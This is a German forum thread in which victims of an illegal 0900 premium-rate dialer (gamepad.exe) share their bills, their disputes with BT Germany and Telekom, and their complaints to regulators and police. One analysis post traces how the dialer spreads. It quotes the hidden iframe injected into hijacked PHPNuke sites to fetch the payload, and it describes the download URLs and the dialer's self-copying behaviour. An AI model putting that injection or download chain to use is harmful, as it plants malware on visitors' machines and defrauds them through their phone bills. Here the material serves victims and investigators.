Hilfe! Dialer: 090090000928 gamepad.exe

????

Ganz weit oben hatte ich ja eine these aufgestellt.

Ich versthe die Antwort allerdings nicht. Wieseo mach ich mich strafbar wenn ich uaf eine Seite mit unrechtmäßigen Dialer gehe, und ohne mein zutun plötzlich ne 0900 nummer gewählt wird?
Wieso kann ich den Link nicht einfach nem Zuständigen Menschen (RegTP,Kripo) zuschicken und die unrechtmäßigkeit wird erkannt?
Ich will das Geld nicht überweisen!!!
An die anderen Geschädigten: Wie ist denn bei euch der Stand der Dinge???
 
Mir stieß Deine Erstformulierung etwas bitter auf. Das hatte sich so gelesen, als hättest Du jetzt einen Schaden, den Du mit einer späteren Session dokumentieren wolltest. Solange er mit offenen Karten spielt, macht sich ein Anzeigenerstatter selbstverständlich nicht strafbar.
 
Ne so war das nicht gemeient . Ich mach mir bewusst nochmal nen schaden und dokumentiere den dann. Oder nutze den link einfach als Ansatzpunkt.
Hat denn jemand ne Ahnung wo man sich diesen dialer einfangen kann?
 
Betroffene von 0900 90000 928

Hallo Betroffene nochmal,

sehr aufschlußreicher Link für alle die, die nicht wissen wie es um sie und die Telefonrechung geschah:

http://www.peterhuth.de
Thema:
Ein Dialer aus dem Nichts

So werden wir wahrscheinlich immer noch abegzockt.
Meiner Meinung hilft nur Widerspruch zum Betrag der Nummer auf der Telefonrechnung (andere Beträge unbedingt an die Telekom überweisen!!!) und auch an die BT ein Widerspruchsschreiben mit dem Vermerk dass nicht gezahlt wird. Desweitern eine Beschwerde an die Regtp. Vordruck kann man dort finden. Hilft die Sache zu beschleunigen, damit sie gesperrt wird.

Es wird überall geraten in gar keinem Falle zu zahlen, was ich auch nicht und niemals tun werde. Zur Not muß die Rechtsschutz herhalten, wenn es schlimm kommt....Es soll jedoch kein Fall bekannt sein, trotz Mahnungen und Androhungen, der jemals in dieser Richtung vor dem Gericht tatsächlich gelandet ist.

Also nur Mut und auf in den Dialerdschungel, die schwarzen Schafe suchen.


mfg
der wütende Internetuser, der mithilft diesem Treiben ein Ende zu machen
 
Aka-Aka schrieb:
Wie kommt man nun genau von der 090090000928 auf die 090090000606?
Da der eigendliche dialer (oft gamepad.exe) jedesmal neu aus dem Netz geladen wird, sind unterschiedliche Einwählnummern ja durchaus möglich.
Also normalerweise ist es bei dem Ding so: Aufbau der Verbindung über normalen Anbieter. Unbemerkter Download des dialers (und wie genau, das ist für mich noch das Problem), trennen der Verbindung und Neueinwahl über 09009*, Löschen der Explorer-History (zumindest bei mir).

Nach gründlicher suche auf einem befallenen Rechner fand sich auch noch ein SD.bot. Evtl. wurde ja darüber der dialer nachgeladen?

Tostan
 
Hallo Leute,

als ersten möchte ich alle wirklich Interessierten und/oder Geschädigten bitten, sich nicht nur als "Gast" zu äußern, sondern sich auch zu registrieren. Das :
- kostet nichts,
- ist eine Sache von 3 Minuten
- und hat den großen Vorteil, dass man in einem so langen und unübersichtlichen Thread wie diesem die Leute zu spezifischen Fragen direkt per PN ansprechen kann.
- Außerdem verbieten die Regeln die Bekanntgabe von E-Mail-Adressen nur im Forum, nicht in den Persönlichen Nachrichten!

Zum Thema:

Zwar entspringt die ganze "Flut" diverser illegaler BT-Dialer scheinbar nur einer einzigen "Quelle" und insofern ist es durchaus sinnvoll, sie im Zusammenhang zu sehen. Juristisch stellt jedoch jeder einzelne Dialer - wenn ich das richtig verstanden habe - ein eigenes Problem dar.

Ich möchte daher einen eigenen Thread für die Nummer 0900/9000606 aufmachen, um möglichst viele Informationen über den Dialer zusammenzutragen, der für unter anderem mich relevant ist.

Nur bei möglichst vollständiger Dokumentation aller Eigenarten eines Dialers und Zusammentragen der entsprechenden Beweise und Zeugenaussagen lässt sich der lockere - und wichtige (!) - Informationsaustausch eines Forums zu einem gerichtsverwertbaren und damit wirklich schlagkräftigen Werkzeug aufkonzentrieren.

Ich habe vor, meine Vorgehensweise im Umgang mit meiner Rechnung (über ca. 100 Euro) sowie alle tatsächlichen wie juristischen Fakten dort vorgangsaktuell zu dokumentieren.

Näheres siehe: http://forum.computerbetrug.de/viewtopic.php?t=5408

Werner
 
neward schrieb:
Zwar entspringt die ganze "Flut" diverser illegaler BT-Dialer scheinbar nur einer einzigen "Quelle" und insofern ist es durchaus sinnvoll, sie im Zusammenhang zu sehen. Juristisch stellt jedoch jeder einzelne Dialer - wenn ich das richtig verstanden habe - ein eigenes Problem dar.

Ich möchte daher einen eigenen Thread für die Nummer 0900/9000606 aufmachen, um möglichst viele Informationen über den Dialer zusammenzutragen, der für unter anderem mich relevant ist.

Normalerweise stimmt wohl deine Aussage, aber bei diesem speziellen Dialer (gamepad.exe) ist es wohl so, dass der eine Dialer verschiedene Nummern anruft, so dass es wohl auch Juristisch dasselbe Problem ist.

Falls du deinen PC nicht bereinigt, sondern lediglich einen Warner installiert hat, wirst du bemerken, dass diese gamepad.exe nicht mehr da ist, wenn man nach ihr sucht, die wird scheinbar ständig neu geladen, daher evtl. auch die vershciedenen Rufnummern.

Was mich interessieren würde, was hast du genau auf dem PC gefunden, das heisst, wodurch wird diese gamepad.exe bei dir geladen, wo hast du dir evtl. den Dialer eingefangen (URL) Wird auch bei dir der Verlauf des Internet Explorers gelöscht?

Tostan
 
> ... gamepad.exe ... wird scheinbar ständig neu geladen, daher ... die verschiedenen Rufnummern.
> ... so dass es wohl auch juristisch dasselbe Problem ist.

Ok, irgendwie einleuchtend !

> ... wodurch wird diese gamepad.exe bei dir geladen, wo hast du dir evtl. den Dialer eingefangen ...
> Wird auch bei dir der Verlauf des Internet Explorers gelöscht?

Den Prozess gamepad.exe habe ich mal kurz gesehen, aber wohl rechtzeitig genug abgewürgt, als dass er sich hat einwählen können.

Bei mir hieß der Bösewicht "d_2.exe". Dessen Auswirkungen habe ich erst mehr als 3 Wochen nach der Attacke bemerkt, nämlich auf der Telefonrechnung ! Und da erfasste der Verlauf die relevanten Daten schon nicht mehr.

Da ich ihn, den Verlauf, aber fast nie benutze oder auch nur ansehe, mag es sein, dass er gelöscht wurde, ohne dass ich etwas davon mitbekommen habe. - Tut mir Leid.

Ich habe zwar einige ganz dunkle Vorstellungen, wo es evt. gewesen sein könnte, aber...
Ich melde mich, wenn ich wieder drüber stolpere.

neward
 
Bei BT Widerspruch eingelegt, was kommt jetzt?:)

Moin!
Ich habe am 23.4. eine Tel.Rechnung mit einer Forderung (ca. 30 EUR)
von der BT Germany erhalten. (wg. Einwahl 0900/90000928).
Nach einigen Tagen des Nachdenkens -und hier Mitlesens- habe ich
das Geld zurückgefordert, dann den regulären Telekom-Teil wieder überwiesen.
An Telekom geschrieben und an BT, dass die Forderung durch einen
m.E. illegalen Dialer verursacht wurde und ich nicht zahlen will.
(Und Meldung an RegTP.)
Bis jetzt keine Antwort. Was passiert nun eigentlich? :)

Grüße
BH
 
Dialertechnik

Liebe Life & Art Geschaedigten,

inzwischen sind meine Nachforschungen von etwas Erfolg gekroent worden. Allerdings liefert der Downloadlink des Dialers, der heute morgen noch auf den Dialer weiterleitete, derzeit nur eine leere Seite. Ob die Verantwortlichen hellhoerig geworden sind, nachdem sie ihre Log Dateien gesichtet haben?

Herkunft des Dialers
Der eigentliche Dialer stammt von einem Webserver, der unter etlichen alias Namen sowie mit mindestens zwei verschiedene IP Adressen betrieben wird (Load Balancing?) Dem Servernamen bin ich durch einen Hinweis im Forum von Teltarif in diesem Posting auf die Spur gekommen. Vorsicht, der dort gepostete Link ist scharf. Suche bei Google zeigt interessante Hits zu dieser Site. Die Datei enthaelt ein
Visual Basic Script, in dem der Dialer codiert ist.

Typen und Funktionsweise
http://$DOWNLOAD/download/dialer/dialers/d_1.exe.php?AID=XXX
http://$DOWNLOAD/download/dialer/dialers/d_2.exe.php?AID=XXX
http://$DOWNLOAD/download/dialer/dialers/d1.exe.php?AID=XXX
http://$DOWNLOAD/download/dialer/dialers/d2.exe.php?AID=XXX

Ich bin mir nicht sicher, welcher welcher ist, aber entpackt man den darin kodierten Dialer, gibts als einzige grafische Einwahlaufforderung den angehaengten Hinweis von 0900Warner. Nicht nett. Das duerfte selbst der RegTP nicht als Einwahldialog reichen. Gemein ist auch, dass ein Teil der Dialer dabei eine Weile (etwa 1-2 Minuten) warten. Keiner der Dialer ist bei der RegTP zugelassen.
Die Dialer erstellen dabei uebrigens interessanterweise eine Kopie von sich selbst unter C:\winnt\system32\shellext\w.exe, und fuehren diese mit Kommandozeilenparametern "-aid -inst" aus. Gleichzeitig gibt es eine del.bat, die beide Dateien und sich selbst loescht.

Dieses Script wird uebrigens erst nach Abfrage der Anbindung (Lan oder Modem) und des Browsers (Internet Exploerer Version >=4) ausgefuehrt, andernfalls landet man auf einer blanken HTML Seite. Die Odyssee beginnt dabei mit der URL

http://$DOWNLOAD/download/download.php?id=$NR&AID=$XXX

Allerdings endet gerade diese Kaskade derzeit immer auf einer leeren Seite, wo gestern/heute morgen nur die LAN Verbindungen landeten, da hat jemand an den Skripts gewurschtelt.

Als Variante des Dialers gibt es noch zwei Alternativen, die per Plugin "eu_cax.cab" geladen werden. Dieses ist im Wesentlichen ein Internet Explorer Plugin, welches eine Datei von einer URL herunterlaedt und ausfuehrt. Diese Dialer sind ein Byte kuerzer als die vorigen Varianten, aber funktionieren beinahe genauso. Unterschiede ist der Name der Datei in ShellExt, der in diesem Fall d.exe heisst (Mensch, sind die einfallslos, wie soll man den von HFMs Dialer unterscheiden koennen). ;) Dabei besteht eher Aehnlichkeit zu dem ExDialer.

Einziger Unterschied: Die Nummer hat sich mal wieder geaendert. Und zwar per 006905051 ins wunderschoene Atafu Atoll, Tokelau. Ich denke mal, ET will nach Hause Telefonieren. Weniger weit weg, und vermutlich weniger lukrativ ist der zweite Anruf, der geht nach Estland, 0037270220140.

Einsatz
Ok, nun ist klar, was der Dialer macht, aber wo wird der Dialer eingesetzt? Und dies ist meines Erachtens ein Novum an Dreistigkeit. Bin beim Suchen nach der Download URL ueber einen Thread in einem Schweizer Webmasterforum gestolpert. Per Exploit wird ein Webserver gehijackt, und in die index.html Seiten ein iframe eingebaut
Code:
<IFRAME SRC="http://www.forced-action.com/?d=get" WIDTH="1" HEIGHT="1"></IFRAME>
Der entsprechende Server ist derzeit scheinbar nicht mehr am Netz, aber der Link leitete wohl einstmals direkt auf die oben genannte Download URL. Suche nach dem String "forced-action.com" bei Google liefet immerhin 117 Hits. Scheinbar wird insbesondere ein Exploit in PHPNuke missbraucht.

Nun ja, erst einmal genug fuer heute,

Gruesse,
TSCoreNinja

PS: alle hier gemachten Aussagen koennen gerne gegenueber den Geld eintreibenden Institutionen zitiert werden. Weitere Details koennen per PN angefragt werden. Ansonsten werde ich das Ganze mal ordentlich dokumentiert der RegTP zutragen.

[edit 22:37] Link zum Schweizer Forum berichtigt[/edit]
 

Anhänge

  • dialer090090000606.jpg
    dialer090090000606.jpg
    24,8 KB · Aufrufe: 176
  • dialer090090000928.jpg
    dialer090090000928.jpg
    25,7 KB · Aufrufe: 177
0900...928

zu dailer1.exe und Variationen

Hallo zusammen. Habe mir am 12.04. eben diesen dailer eingefangen. Wie bei allen anderen "Opfern" ohne Bestätigung etc. Gehöre zur aussterbenden Spezies der Analogtelefonierer. Zwei Einwahlen am 12. und am 13. April konnte ich kurzfristig abbrechen, der Schaden blieb mit insgesamt nicht mal 3 Euro zum Glück gering. (BT(Germany), Barthstraße ...)
Ärgerlich folgendes. Mein Modem steht grundsätzlich auf Lautsprecher ein. Der dailer schaltet jedoch den Lspr aus, ein neuer Verbindungsaufbau verursacht lediglich ein leises Klicken durch ein abfallendes Relais auf der Modemkarte. Nur durch Neuinstallation zu beheben
Totalentfernung war zunächst nicht möglich, der dailer taucht immer wieder auf, ist allerdings nicht zu lokalisieren.
Ich habe XP als Betriebssystem oft verdammt, hier hat allerdings die Systemwiederherstellung geholfen. Wiederherstellungszeitpunkt auf einen Termin vor dem dailerbefall gesetzt und der Spuk war vorbei.
Kontaktaufnahme mit Polizei: Habe bei einer DV-Gruppe (bearbeitet u.a. Computerkriminalität) der Polizei nachgefragt. Strafverfolgung benötigt Spurensicherung auf dem Rechner, Bearbeitungszeit durch Überlastung bis zu mehreren Wochen. Habe deshalb auf Anzeige verzichtet.
Kontakt mit Telekom: Über 0800 ServiceNummer. Mitarbeiter sagt zu, Abbuchung des entsprechenden Anbieters wird gestoppt, Ansprüche werden geprüft, meinen Anschluß habe ich für 0190 und 0900 blocken lassen.

Vielleicht kann ich mit diesem Beitrag niemanden helfen, aber ich muß mir den Frust mal von der Seele schreiben.
 
Re: 0900...928

harz1961 schrieb:
Strafverfolgung benötigt Spurensicherung auf dem Rechner, Bearbeitungszeit durch Überlastung bis zu mehreren Wochen. Habe deshalb auf Anzeige verzichtet.

:evil:

Dann sollen sie doch wenigstens notieren, dass ein weiterer Fall mit diesem Dialer vorliegt und zumindest eine Diskette oder CD mit den wenigen Hinweisen aufheben, die es gibt. Aber mal wieder: keine Anzeige, dideldideldüüü, und Rumpelstilzchen hüpft vor Freude und trinkt ein Schlückchen auf seine Zunft und ihre exekutionsunfähigen exekutiven Organe

cj
 
Re: 0900...928

Aka-Aka schrieb:
harz1961 schrieb:
Strafverfolgung benötigt Spurensicherung auf dem Rechner, Bearbeitungszeit durch Überlastung bis zu mehreren Wochen. Habe deshalb auf Anzeige verzichtet.

:evil:

Dann sollen sie doch wenigstens notieren, dass ein weiterer Fall mit diesem Dialer vorliegt und zumindest eine Diskette oder CD mit den wenigen Hinweisen aufheben, die es gibt. Aber mal wieder: keine Anzeige, dideldideldüüü, und Rumpelstilzchen hüpft vor Freude und trinkt ein Schlückchen auf seine Zunft und ihre exekutionsunfähigen exekutiven Organe

cj

Sorry, hätte die Details dazuschreiben sollen: mit Wiederherstellung und fast 3 Wochen Betrieb bis Rechnungseingang waren da keine Spuren mehr. Ansonsten arbeiten die Jungs ganz ausgezeichnet. Werden aber mit Kinderpornografie und ähnlichen Ermittlungen erschlagen.
 
Re: 0900...928

Aka-Aka schrieb:
Dann sollen sie doch wenigstens notieren, dass ein weiterer Fall mit diesem Dialer vorliegt und zumindest eine Diskette oder CD mit den wenigen Hinweisen aufheben, die es gibt. Aber mal wieder: keine Anzeige, dideldideldüüü, und Rumpelstilzchen hüpft vor Freude und trinkt ein Schlückchen auf seine Zunft und ihre exekutionsunfähigen exekutiven Organe

cj

Ist doch leider eh immer so, egal ob Strafanzeige erstattet wurde oder nicht. Meist werden die Verfahren von der Staatsanwaltschaft eingestellt, weil angeblich kein genügendes öffentliches Interesse an der Strafverfolgung existiert oder weil die Verantwortlichen im Ausland (auch im europäischem) leben. Nur in den seltensten Fällen (Interfun) kommt es tatsächlich mal zu Aktionen. Ansonsten zeigt die Staatsanwaltschaft nur sehr wenig Interesse an der Verfolgung von Dialerbetrug. Das sieht man auch daran, das die HFM und Co schon seid einem halben Jahr ihr Unwesen treiben können, ohne das irgendetwas von staatlicher Seite dagegen unternommen wird. Das lässt sich auch nicht mit Arbeitsbelastung oder "so etwas braucht Zeit" wegdiskutieren, wenn man daran denkt, wie schnell die nötigen Schritte gegen den Sasser Schreiber unternommen wurden, sieht man, das es auch anders gehen kann.
 
Anonymous schrieb:
http://www.heise.de/security/dienste/browsercheck/demos/ie/e5_20.shtml
darum geht es und nur darum.
Irrtum! Hier kommen zwei Sicherheitslücken zusammen:
1) SQL Injection in ein unsicheres NukePHP Skript
2) Sicherheitslücke im IE, für die es seit 13.4.2004 ein Patch gibt

Ziff. 1: Skripte, die aus Usereingaben die Zeichen
Code:
<(.|\n)+?>
nicht in ungefährlichen Code umwandeln, sind einfach grottenschlecht. Leider kann der Besucher der Webseite nichts dagegen tun.
Ziff. 2: CHM Exploits sind ebenso grottenschlecht, aber der User kann das Patch anwenden.
 
Counselor schrieb:
Ziff. 1: Skripte, die aus Usereingaben die Zeichen
Code:
<(.|\n)+?>
nicht in ungefährlichen Code umwandeln, sind einfach grottenschlecht. Leider kann der Besucher der Webseite nichts dagegen tun.

gibts eigendlich ein Programm, das PHP-Code auf solche Lücken abcheckt? (z.B. so ähnlich, wie es tools gibt, die C-Code auf potentielle Buffer Overflows testen?) klar, das hilft den Besuchern einer Webseite wenig, aber evtl. können Webmaster sich davor schützen potentiell unsichere Scripte laufen zu lassen. (Irgendwie hab ich das Gefühl, nirgendwo ist die Spanne zwischen sehr guten und grottenschlechten Programmierern grösser als bei php)
 
Tja mich hats auch mit erwischt: 150 EUR netto. Fernmündliches Nachfragen bei der BT (Germany) ergab das es die Nummer 0900 9 0000 928 war und das Androhen eines Mahnverfahrens, falls ich nicht zahlen würde.

Als Betreiber wurde eine Frau D. S.... mit Postfach in Bingen genannt, an der solle ich mich wenden, wenn ich ein Problem hätte.

Die einzelnen Verbindung waren:
11.04.: 14:02 min = 24,20 EUR
11.04.: 03:10 min = 5,46 EUR
13.04.: 14:04 min = 24,25 EUR
13.04.: 14:04 min = 24,25 EUR
13.04.: 14:07 min = 24,34 EUR
18.04.: 14:11 min = 24,45 EUR
19.04.: 14:15 min = 24,57 EUR

komisch oder? immer 14 Minuten (bis auf eine Ausnahme)

Ich verwende eine DSL-Flatrate, leider ist meine ISDN-Karte mit dem Telefonanschluß verbunden. Von den Dialer selbst habe ich nichts mitbekommen und deswegen auch keine Beweise oder soetwas gesichert.

In den betreffenden Zeitraum hatte ich aber vermutlich so eine Art Trojaner (ja ich bin ein Noob) auf meinem PC. Nachzulesen bei:
http://www.trojaner-board.de/forum/ultimatebb.php?ubb=get_topic;f=6;t=005163;p=1

Jetzt glaube ich an einen Zusammenhang, hat irgendwer Ideen?
Auch der oben genannte Heise-Beitrag mit der Notepad.exe ist interessant da ich ja komischerweise eine Notepad.exe.bak auf meiner Platte gefunden habe.

Mit der Telekom habe ich schon gesprochen. Die Telefonistinnen waren sehr mitfühlend und wollen mir einen Einzelverbindungsnachweis mit vollständiger Nummer senden. Vermutlich wird es aber die besagte -928 sein.

Der RegTP habe ich schon mal eine Email mit dem Sachverhalt geschickt und Montags geht es zur Bank, Rückbuchung des Betrags und Bezahlen des unstrittigen Betrags unter dem Vermerk, daß BT nicht bezahlt wird.
Und die Rechtschutz ist auch schon rausgekramt. Mal zurücklehen und sehen was passiert.

Der Herr von BT (Germany) meinte ja, wir würden uns dann sehen...
(hoffentlich vor Gericht und nicht Russisch Inkasso? ;)

Gruß

Klaus

[Virenscanner: Namen gekürzt]
 
Zurück
Oben